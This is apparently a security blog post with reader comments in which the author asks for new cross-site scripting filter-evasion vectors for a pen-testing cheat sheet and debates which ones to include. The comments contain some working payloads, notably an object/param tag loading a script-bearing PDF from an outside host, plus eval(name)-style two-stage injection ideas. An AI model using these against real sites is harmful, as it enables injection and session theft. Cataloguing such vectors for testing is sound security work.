Hey guys - sorry I haven't posted in a while. Busy busy busy. But I'm here to solicit your help! I finally got around to re-testing all of the old vectors, updating them and writing it all up for the next revision of the XSS Cheat Sheet. What I haven't done is add new vectors in yet. So this is your chance if you have known about something for years, want it on the page and want credit for having found it. If you do want to update the cheat sheet with something here's the deal:

1) It must work in one of the browsers listed
2) It must work _without_ user interaction - onmouseover is great and all but it's terrible for demonstration purposes.
3) It must fire a popup with text at a minimum - alert(1) is fine for some things but in reality it must at least pop text to prove that it works for the folks who use this for pen-testing.
4) It must be _significantly_ different from all current vectors listed - by significantly I mean it can't replace a char or two. It's gotta actually be different.
5) It must be a way to bypass filters - not just a JavaScript obfuscation technique - although it might be worthwhile to have one JavaScript obfuscation technique in there (the best/most important) and point back to tra.ckers or the thread on sla.ckers for the rest, since it's really it's own thing.

The goal of the XSS Cheat Sheet was never to make a completely exhaustive list - but rather to bring together unique filters to get people thinking about all the possibilities. It's a cheat-sheet after all! Here's a link to the new page (it will eventually replace the old page and/or I may keep the old page as a revision for posterity): http://ha.ckers.org/xss2.html

So fire away with new vectors only. Oh yeah, and if you paste something here that's identical to something that's already been on the page for three or four years now, I'm going to put a doorknob in a sock and beat you with it. Control-F isn't that hard.

1. Works in Internet Explorer 8 (may work in earlier versions of IE)
2. No user interaction needed.
3. It alerts text.
4. None of the other vectors use a PDF as the payload. In this case, the pdf is invoking VBScript
5. It can be used to bypass filters and is not just JS obfuscation.

Kuza's actual XSS was <object data=anything_at_all.pdf><param name=src value="http://p42.us/xss.pdf"></param></object> which may also warrant a separate entry due to the unique way the object src attribute is used. None of the other vectors really do this (with the src attribute).

@Rsnake - can you number them? would make it a lot easier to refer to different injection. Also, will you cover two stage injections at all - like eval(name) and eval(location.hash)? I see these as above just 'obfuscation'. They are useful ways to inject a *real* XSS payload (not just harmless alert) when the size of the injection is a serious constraint.

This is particularly interesting in EUC-JP/Shift_JIS etc. environments - or in case nullbytes or similar stop the web-server from delivering content. Was reported several weeks ago but considered to be 'not our bug'.

And you can put a form feed chr(12) between the <script and src elements in Internet Explorer.

@Gareth - all of the onreadystatechange ones mentioned above should be covered given that it's mentioned in the Event Handlers list already. Unless you think there's some other reason it should be called out independently. Also, CSS expressions are already on the cheat sheet. New vectors should be new, not minor variants on existing vectors. I want to stay away from trying to enumerate every variant possible.

@Kuza55 @Gareth - you're right - <object data="xss.pdf"></object> only works on same domain. I should have checked that before. Makes the fact that the param version works at all the stranger/cooler though :)

@Gareth - seriously relax, it'll be okay. I'm not saying you're dumb, I just don't want to make the cheat sheet a cheat book. onReadyState change, as I said, is already on the cheat sheet in the even handlers section. Can you give me a good reason it needs to be included beyond that? Specific now, not just "It evades filters" why is it important? And no, I'm not putting 10 of the same event handler on there. I may make one note of it and enumerate why it's different, but only if it's really worth mentioning.

The CSS vectors are at least somewhat repeats of one another. A few of them I do think belong on there, but I can't put every single variant and still make it readable. If one or two are notable, or if you can combine them all into one, that's much better. Otherwise it'll get even more unruly than it is now. Again, it's a cheat sheet, not a cheat book. The goal is to make it nice and compact and above all useful!

Now that said, I agree the <IMG SRC vectors seem a little out of context if you're thinking about wOw factor. But I definitely wasn't when I wrote this. Remember, the original reason I put it on there was to enumerate what chars needed to be there or not. At least once a week I run into a vector that requires that certain chars are not present. So these all make sense in that context. Perhaps they could be collapsed into other vectors, but yes, needing or not needing double quotes is something that needs to be spelled out at least somewhere on the cheat sheet. In fact, I removed the one with &quot; below, because it's redundant with the last one and I changed one of the others to use onerror because I think people were thinking that image tags weren't dangerous anymore because IE changed their behavior in IE7.0. That's what I get for retaining a document that dates back to IE6.

It may be worth including the CSS expression vector with the minor variant that fixes the looping issue. I say this only because the variant is what makes the vector practical. Originally seen: http://sla.ckers.org/forum/read.php?2,15812#msg-15849